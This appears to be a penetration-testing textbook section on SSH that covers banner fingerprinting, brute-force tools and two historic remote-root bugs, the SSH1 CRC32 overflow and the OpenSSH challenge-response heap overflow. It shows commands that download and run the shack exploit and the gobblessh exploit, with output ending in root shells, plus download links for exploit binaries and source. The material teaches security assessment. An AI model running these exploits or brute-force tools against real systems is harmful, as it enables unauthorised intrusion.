7.2 SSH

Secure Shell (SSH) provides encrypted access to Unix and Win32 command shells. Weaknesses in plaintext services such as Telnet were often abused by attackers to compromise networks, so SSH was introduced to provide encrypted access to Unix-based hosts for maintenance purposes.

Before 1999, the only SSH servers available were for commercial use and provided by SSH Communications (http://www.ssh.com) and F-Secure (http://www.f-secure.com). In late 1999, the OpenBSD team worked to provide SSH support in Version 2.6 of their operating system, and OpenSSH 1.2.2 was born. Commercial versions provided by SSH Communications and F-Secure remain supported and are sold, but OpenSSH has proved to be extremely popular and is now included with most Linux distributions.

Due to its cryptographic nature, an SSH client is required to connect to and authenticate with SSH. The free OpenSSH package can be downloaded from http://www.openssh.com.

For Windows users, PuTTY is a freely downloadable tool available with a host of other SSH client utilities (including PSCP, PSFTP, and Plink) available from http://www.chiark.greenend.org.uk/~sgtatham/putty/.

7.2.1 SSH Fingerprinting

To correctly ascertain vulnerabilities that may be present in the target SSH service, first perform banner grabbing by using telnet or nc to connect to the SSH service. Example 7-1 shows how telnet can do this: the banner shows the host is running OpenSSH 3.5 patch level 1 using the SSH 2.0 protocol.

Example 7-1. Grabbing the SSH service banner using telnet
# telnet 22


Connected to

Escape character is '^]'.


Security conscious administrators will often modify the SSH banner to present false information. Example 7-2 shows this: the SSH service supports the SSH 2.0 protocol, but the actual type and version of the service itself is unknown (it's set to 0.0.0).

Example 7-2. Grabbing a modified SSH service banner
# telnet 22


Connected to

Escape character is '^]'.


Here's a list of common SSH service fingerprints:

Cisco SSH 1.25

# telnet 22


Connected to

Escape character is '^]'.


SSH Communications SSH 2.2.0

# telnet 22


Connected to

Escape character is '^]'.


F-Secure SSH 1.3.6

# telnet 22


Connected to

Escape character is '^]'.


If SSH-1.99 is reported by the SSH service, both SSH 1.5 and 2.0 protocols are supported. Some SSH clients, such as PuTTY, previously didn't support SSH 2.0, and many administrators accordingly ran their services to be backward-compatible.

7.2.2 SSH Brute-Force Password Grinding

By its very design, SSH is a protocol resilient to brute-force attacks. The service first accepts the username and then allows for three passwords to be provided. If the user fails to provide the correct username and password combination, the unauthorized access attempt is written to the system log.

Sebastian Krahmer wrote a threaded SSH2 brute-force tool called guess-who. The utility allows for up to 30 attempts per second on internal networks, so mileage varies across the Internet depending on server configuration and connection speed. The tool compiles cleanly in Unix environments; find it at http://packetstormsecurity.org/groups/teso/guess-who-0.44.tgz.[1]

[1] URLs for tools in this book are mirrored at the O'Reilly site, http://examples.oreilly.com/networksa/tools.

An expect script available from http://examples.oreilly.com/networksa/tools/55hb.txt is a simple way to perform brute force against both SSH1 and SSH2 services. The 55hb script simply parses usernames and passwords to the Unix SSH client binary.

7.2.3 SSH Vulnerabilities

The presence of process manipulation vulnerabilities within SSH services depends on two things:

  • The SSH server and version in use (OpenSSH, LSH, Cisco, or commercial SSH)

  • The SSH protocol version the target server supports (1.0, 1.5, 1.99, or 2.0)

Knowing the SSH service type, version, and which protocols are supported, you can check vulnerability databases and sites, including MITRE CVE, ISS X-Force, SecurityFocus, and Packet Storm, to ascertain whether the services at hand are vulnerable to attack.

Two serious remote vulnerabilities uncovered in SSH since 2001 are the SSH1 CRC32 compensation vulnerability and the OpenSSH 2.9.9-3.3 challenge-response bug. In the next few sections, I discuss these bugs along with examples of exploitation. Many other bugs have been found in SSH, but they rely on nondefault options enabled at compilation or on valid username and password combination (these are known as post-authentication vulnerabilities). SSH1 CRC32 compensation vulnerability

On February 8, 2001, CORE-SDI released an advisory documenting a remote integer overflow in several implementations of the SSH1 protocol. Ironically, this vulnerability is located in a segment of code that was introduced to defend against exploitation of CRC32 weaknesses within the SSH1 protocol (see http://www.kb.cert.org/vuls/id/13877).

The attack detection function (detect_attack( ) located in deattack.c) uses a dynamically allocated hash table to store connection information that is then examined to detect and respond to CRC32 attacks. By sending a crafted SSH1 packet to a vulnerable host, an attacker can cause the SSH service to create a hash table with a size of zero, resulting in an overflow and arbitrary code being executed.

Full details of this vulnerability and vendor patches are available at:


Nowadays, most SSH servers support only Version 2 of the protocol and aren't susceptible to this attack. If you see a server respond with a 1.5 or 1.99 protocol string in its banner, it is probably vulnerable. SSH1 CRC32 compensation exploit

Later in 2001, a publicly available (but Linux precompiled) exploit known as x2, x4, or shack became available, mirrored at http://packetstormsecurity.org/0201-exploits/cm-ssh.tgz.

Example 7-3 shows how I download, unpack, and run the precompiled Linux shack exploit, revealing command-line options and available target offsets.

Example 7-3. Downloading and running shack
# wget http://packetstormsecurity.org/0201-exploits/cm-ssh.tgz

# tar xvfz cm-ssh.tgz




# ./shack

SSHD deattack exploit. By Dvorak with Code from teso

error: No target specified

Usage: sshd-exploit -t# <options> host [port]


        -t num (mandatory)  defines target, use 0 for target list

        -X string           skips certain stages

# ./shack -t0

SSHD deattack exploit. By Dvorak with Code from teso


( 1)    Small - SSH-1.5-1.2.27

( 2)    Small - SSH-1.99-OpenSSH_2.2.0p1

( 3)    Big - SSH-1.99-OpenSSH_2.2.0p1

( 4)    Small - SSH-1.5-1.2.26

( 5)    Big - SSH-1.5-1.2.26

( 6)    Small - SSH-1.5-1.2.27

( 7)    Big - SSH-1.5-1.2.27

( 8)    Small - SSH-1.5-1.2.31

( 9)    Big - SSH-1.5-1.2.31

(10)    Small - SSH-1.99-OpenSSH_2.2.0p1

(11)    Big - SSH-1.99-OpenSSH_2.2.0p1

I can now launch the exploit against my vulnerable Red Hat Linux 6.2 server running OpenSSH 2.2.0p1 at using target number 10, as shown in Example 7-4.

Example 7-4. Compromising a Red Hat 6.2 host using shack
# ./shack -t10 22

SSHD deattack exploit. By Dvorak with Code from teso

Target: Small - SSH-1.99-OpenSSH_2.2.0p1


Testing if remote sshd is vulnerable # ATTACH NOW


Finding h - buf distance (estimate)

(1 ) testing 0x00000004 # SEGV #

(2 ) testing 0x0000c804 # FOUND #

Found buffer, determining exact diff

Finding h - buf distance using the teso method

(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #

(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED #

(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #

(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #

(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #

(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SEGV #

(9 ) binary-search: h: 0x083fa9fc, slider: 0x00000200 # SEGV #

(10) binary-search: h: 0x083fa8fc, slider: 0x00000100 # SURVIVED #

(11) binary-search: h: 0x083fa97c, slider: 0x00000080 # SURVIVED #

(12) binary-search: h: 0x083fa9bc, slider: 0x00000040 # SURVIVED #

(13) binary-search: h: 0x083fa9dc, slider: 0x00000020 # SURVIVED #

(14) binary-search: h: 0x083fa9ec, slider: 0x00000010 # SURVIVED #

(15) binary-search: h: 0x083fa9f4, slider: 0x00000008 # SEGV #

Bin search done, testing result

Finding exact h - buf distance

(16) trying: 0x083fa9ec # SURVIVED #

Exact match found at: 0x00005614

Looking for exact buffer address

Finding exact buffer address

(124) Trying: 0x080e0614 # SURVIVED #

Finding distance till stack buffer

(134) Trying: 0xb7f242f4 # SURVIVED # verifying

(135) Trying: 0xb7f242f4 # SEGV # OK

Finding exact h - stack_buf distance

(140) trying: 0xb7f24154  slider: 0x0020# SURVIVED #

(141) trying: 0xb7f24144  slider: 0x0010# SURVIVED #

(142) trying: 0xb7f2413c  slider: 0x0008# SEGV #

(143) trying: 0xb7f24140  slider: 0x0004# SEGV #

(144) trying: 0xb7f24142  slider: 0x0002# SEGV #

Final stack_dist: 0xb7f24144

EX: buf: 0x080dd614 h: 0x080d8000 ret-dist: 0xb7f240ca


Changing MSW of return address to: 0x080d

Crash, finding next return address

Changing MSW of return address to: 0x080e

Crash, finding next return address

EX: buf: 0x080dd614 h: 0x080d8000 ret-dist: 0xb7f240ae


Changing MSW of return address to: 0x080d

Crash, finding next return address

Changing MSW of return address to: 0x080e

No Crash, might have worked

Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

Linux www 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

The exploit takes a few minutes to run because it performs binary searching and return-address brute-forcing to inject and run its shellcode. Chapter 13 discusses exploitation issues in some detail, discussing differences between simple stack overwrites, integer overflows, and heap-corruption vulnerabilities. The original x2 exploit source code is extremely rare, but it's available from the O'Reilly archive at http://examples.oreilly.com/networksa/tools/x2src.tgz. OpenSSH challenge-response vulnerability

On June 26, 2002, Internet Security Systems (ISS) released an advisory documenting a remotely exploitable heap overflow bug within the challenge-response authentication mechanism of OpenSSH (present within Versions 2.9.9 to 3.3). To exploit this vulnerability, the target SSH service must compiled with BSD_AUTH or SKEY authentication options enabled, which is the case within OpenBSD 3.0 and 3.1 in particular.

Full details of the vulnerability and respective vendor patches are available at:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639 OpenSSH challenge-response exploit

ISS hasn't release any public exploit code relating to this vulnerability. The GOBBLES security team, however, released an SSH client patch exploit to remotely compromise OpenBSD 3.0 and 3.1 hosts running OpenSSH 2.9.9 to 3.3; it's available at http://www.immunitysec.com/GOBBLES/exploits/sshutup-theo.tar.gz.

After compiling a patched SSH client (gobblessh), you can run the tool and reveal the usage and supported options, as shown in Example 7-5.

Example 7-5. The gobblessh usage and options
# ./gobblessh 


OpenSSH 2.9.9 - 3.3 remote challenge-response exploit

#1 rule of ``ethical hacking'': drop dead


Usage: gobblessh [options] host



  -l user     Log in using this user name.

  -p port     Connect to this port.

  -M method   Select the device (skey or bsdauth)

              default: bsdauth

  -S style    If using bsdauth, select the style

              default: skey

  -d rep      Test shellcode repeat

              default: 10000 (with -z) ; 0 (without -z)

  -j size     Chunk size

              default: 4096 (1 page)

  -r rep      Connect-back shellcode repeat

              default: 60 (not used with -z)

  -z          Enable testing mode

  -v          Verbose; display verbose debugging messages.

              Multiple -v increases verbosity.

Example 7-6 shows the exploit being run against a fresh install of OpenBSD 3.0 at to gain super-user privileges.

Example 7-6. Compromising an OpenBSD server using gobblessh
# ./gobblessh -l root

[*] remote host supports ssh2

Warning: Permanently added '' (RSA) to the list of

known hosts.

[*] server_user: root:skey

[*] keyboard-interactive method available

[*] chunk_size: 4096 tcode_rep: 0 scode_rep 60

[*] mode: exploitation


OpenBSD openbsd 3.0 i386

uid=0(root) gid=0(wheel) groups=0(wheel) Other remotely exploitable SSH flaws

At the time of writing, the CERT vulnerability notes at http://www.kb.cert.org/vuls/ list the remotely exploitable vulnerabilities in SSH services (not including denial-of-service or locally exploitable issues); they are detailed in Table 7-1.

Table 7-1. Remotely exploitable SSH vulnerabilities






OpenSSH 2.1.1 and prior with the UseLogin option allows remote execution of commands as root



SSH CRC32 attack detection code integer overflow bug



OpenSSH 3.3 and prior contains vulnerabilities in challenge-response handling code



Multiple SSH key exchange and initialization bugs



OpenSSH 3.7.1 contains buffer management errors



OpenSSH 3.7.1p1 and prior PAM conversion overflow



OpenSSH 3.7.1p1 and prior PAM authentication failure